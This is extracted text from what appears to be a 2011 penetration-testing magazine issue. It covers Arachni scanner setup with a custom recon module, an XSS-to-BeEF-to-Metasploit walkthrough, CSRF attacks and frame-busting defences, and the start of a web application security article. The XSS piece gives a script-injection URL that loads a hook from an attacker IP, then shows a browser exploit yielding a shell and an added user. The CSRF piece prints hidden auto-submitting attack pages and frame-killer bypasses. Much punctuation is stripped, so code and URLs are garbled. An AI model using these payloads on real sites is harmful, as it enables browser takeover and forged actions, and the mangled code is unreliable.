LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
